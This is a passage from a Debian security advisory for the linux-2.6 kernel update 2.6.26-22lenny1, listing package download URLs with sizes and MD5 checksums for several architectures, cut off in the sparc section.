http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 21102730 604476ba9a35fdb435b4409e5323cf89\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3724662 ae8fed857d819d7a3dd5b3085c367085\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3780338 a2cd8cdd414be8c412bd923576ccb456\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3856722 9621b8e802a4e482de1db03572b0f72d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 20931422 9d71c45188552af06abd5a04d62b7c84\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110350 acdbea58008fec881f380752f9fc3ea6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   397220 709b723fefd37764ab8bffb079eb312f\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 12494622 96304f7aa2bddb3ea2ef404afaa4a513\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   352980 44e27ad26963a2c1dbed9240b28d7c5b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 10294730 8066047f7d15cd2f7a6c93018cfaae37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   369410 e26f28edccaeabf04dec8e4d2d8cc88f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 11443274 d9232ed2bbde0e851f72488a2eea831d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   110444 631821dedb019f48b3133246338f4521\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   751260 027d7225ddd40e26f12a9c7c7cc17b55\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:  4140556 a36e76af416da97176639d34a6dd42a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   368088 8388881b72ce56cef47cb61a51abfe8d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 11731284 cc6e8949fe66950db619eb2996332572\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   110404 611a83d9ddb07104525d3ae7eca714b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   364180 878a5bd8fa6419dd6efe6422c7a14cbc\n\narmel architecture (ARM EABI)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   365700 0327b96ec1802e56c4ffee19ce1c9dc5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   368810 05ee76d995844fc8461223846ab41802\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   110358 830c76ccdf7d7c99f3ea84e1e8bc962d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 11691670 0ecbec767291466b244fd83506f1e112\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   110392 c64900dc9ec3812df164d47c006ecffe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 11399558 2d16b67f176b8223bd4dd33b90217a2e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   340088 3b6e8d8210d6e6e68eee6ddc2cab8f09\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:  4136736 42aebe2283d941bb7724daf03882914d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum: 12451186 f22b998fbdfa29023573bf9b6988dba9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   751906 d1d0480ba764b4ca3bdae8a651acd066\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:  9606938 569b72a642446ac1ffe4ed2aa13f50aa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   370546 a3f2c479e65c9ae3be17641001b33afc\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   302516 dd1800b19f0df391bd05658a0a7846c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   110354 479a0788049f39e648e57a3c5007b993\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:  3598606 4429cb37eda685553dde7198e5b47fd5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   762928 fe2e02babc93f6bdcc16c8f7ad8a5a88\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   301842 1e58cca757600c08424118ace4a50da5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   110374 9198f6103932b14d766b0e4c32110806\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   301034 890ed76fde4dedddcb9db60f7ba0091d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 17127808 a2cffd928aa5e30ab9f1f30e41b9aed1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 17678124 53aa5bddb6f2af761a8bfcb1fef54d02\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 15784596 c892e98e5ab6fcf6aa84aa5e5021309f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum: 16388546 0ce6b1186e64e745a0680088d2c9fcad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb\n    Size/MD5 checksum:   303348 6991ba8c20ae638798fda57540014d30\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   399720 ee32214acdf697edca92068f2d64f8b3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110450 191bb7f29ece9f8ea2f8cff03efae3cd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   398126 32ef574340b20e8f2c7465f2290a8c0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   413242 a5f35b11ae06961132fd16e21d5b5337\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   409820 586c33fc476019b08a3b75816d9bf520\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110392 3f9c02cb47bc1070b92358227e030768\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20530142 c8e9146e82955c0dda3bcabe8b7542ef\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20509696 98b0e600e9bca75f016f1c4878d9d8e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   767274 369a4858f7dfa2560ec664a08fdbac42\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3865974 0510efa636bb1554f9a2c040c1ee6f19\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20409094 798b4bb9a4b8d81affc30dbc2f284cc3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20679068 6b6c2a57037f510313311d76849a9b0a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3807640 6b21b3346b8196f19ea59d16a2e7b8f4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 18198474 627d51edc59f86bd8dfe2e7a74a25723\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20381812 493e6acfd2d47e456d1471ef44dd18ba\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  1596580 5f456e26e01a793881871f4d683b13b1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   417750 057786734b1771be73cea6c484a09cce\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   410364 4f381b525756e6cf131be68398e58fe7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   110394 46fba74b6675f6df2057da14ba3931f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   409858 99ce0b8165bd71e4b90745ad5a7577d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3947966 aabcdf68ca8c4d35d87ad2eecb569517\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 20350468 fb0caa5f722a968820562223577a4e74\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum: 21022322 befe070ada9e62a69c15f38c9f0e706a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:  3842206 b5e7820e844761d65d8dbf0a4ea639e5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb\n    Size/MD5 checksum:   411454 771b6960fbfd4658124eac3673e01e90\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359186 d2391d9bdb5fe861abe5fbd0f9f2f989\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:  3659176 8df0d712004a67cafedb9b4926970368\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359256 18a5fda7c38b900462ea120ae04a3c98\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34440420 2eddbf5140a8dc8a4a74d4e11a77ea44\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   751862 329f5ddfc14f4f6e63aa3834f7a927fe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:  3691882 19f4f11bbad0443a7ae7153823bcc0e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359722 f3d89cc673ff0f2e5b7ff2e718ff44f1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34252074 96729f987e7b7e02802b240da3a3293c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34376386 f97af824a762b90b102d84f5c1bf65f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   110350 9881f68b5f5446c4c773dc60d655a589\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum: 34191126 c5412cb1277801d2a2488be36dc1ad0e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   110386 c1ddbef0eeae94731617e277b32018c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb\n    Size/MD5 checksum:   359654 cba07c82268fc13d6007ecf4be2c8508\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   262068 31c1aadffe81551bef675f9bc91b6f1e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 29432478 38c75d466da039b9e2ac1c70898b50ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   358936 9ec1ce1473362c253cf4dc7d2fd791f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:  3966442 111674b840698cede9cdf3ecec2d5e3b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   302384 7f9f26f809e46a4748158588402d7ace\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   359360 d07b20a27666a8cb2c43f03eeb729c57\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   285392 9d513d80efd66be3e9ba7fa929b13b5f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   303780 3a507cccd77e01f7449a8ff73a3e5f6f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   760156 80eaea319450a06fe9c2310bdff051e2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 23504896 f928208abb4eb3ade6185409df5fa417\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 20252984 09ee52755ae4cf03ca082e8dbc977206\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 20244176 3c568fce5cab57746ca1dc53c8fcc754\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   110400 6676cd4c8df659937bac47ed0c08bf37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum:   110464 fcbbce5e6741f1a1ec4830dba9a8ee91\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 11542616 0ead2243e1d4c2cb50760d97f9a6a2f7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb\n    Size/MD5 checksum: 15769388 08c7a66b4f1a5c9bc9f8cc5683d5786f\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 19682018 7e665290822815634b1666523270919e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   110460 445931c0ad4fa00f8875f5cbaf9d83aa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 19667420 02ae9fef2fea1c4ccd667c73025039f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   760930 064ffab1507d84791e943528662e4c86\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   297650 4433daa21c6e697d8c1bb33355e14ee1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   359828 870a33c1aea0535ab0b25f3016aa9623\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 23074870 998294807dde61335d413ecf50fdbf3b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:  3967560 590a467f25e74daf442dfd54caaf104e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   303240 9620ba551b29adb6052e13f8277347c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   302768 59fe05d578020afc8e1e8fe3fce3b41c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 28568828 86e20054979d1ffc56c24f5db73d044a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   110406 3a073335ba3488e55549b82e005fefda\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum: 15056072 429c33859de62cdfaa86e809e8625bec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb\n    Size/MD5 checksum:   359706 43272f2843e3b39735812c24aad332f5\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   110358 eb7bc8e6a28a6801bc7be5d22bf95a2f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23581674 48797e6c39bef5a0fd120d973b541f07\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   363808 c2c489e8798d50db73d709367e390113\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   365378 a4c38de9a287a71e84d09d5474393d41\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   110392 9dd420c73a4b0c7d55fe2372a439adfb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23420066 5bf69b74154de2ae05db3280f2070b74\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:  3782640 31d483da8ccb87dbd7f75200515c8b3f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23474914 42ba4ae5a23355aba50cb1a8c018a631\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   366524 a3970adc5168a37d49f28c5ce4ca05ff\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   746782 d0ef1631862e4130479ce4e3da0a6050\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:  3814900 2b936155fef59a231764ca014043b806\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   370710 35281c3da9947c322b12a014adabbcad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23159310 22caa95faeb5687d37e677b4e34503b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum:   371066 9961d473b25000f7bb7a23bde2720323\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb\n    Size/MD5 checksum: 23557104 bd8ab7bd0594a795f34dac94ee24ffae\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   758022 786d9ca518b1a573caf38f5492104cc4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   238208 3155d20f0210f5fd9a2e27fc28165502\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   236574 05d74c2012431ee9bdae90e172a82de0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   237136 7950ba3ebfc31e3cf6536b34eccaf684\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7828888 56510e3515975d5ed979a55fb0bb14b7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  1633146 654e757be4670f764a99049c7984aa98\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  3633806 0c911d5a677f4fdb22f44cf617cd8374\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7534830 da50ed9bfd6846d2ab2ced362b19ab4e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  7889984 06c9c7d89731808d7e376986cc472843\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   110394 68dd1fe380aa0c9ba6caa84f934569fd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:   110416 c1d7fd64b9efab8228f305d5474de5d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb\n    Size/MD5 checksum:  3598560 f63cbef687984b543d1152e013bc95fe\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum: 14291528 b0e802720e53cb53650b8a2d75d1588d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:   304718 aa3ebf9c5e7cde5fc11513c27b4396d0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb\n    Size/MD5 checksum:  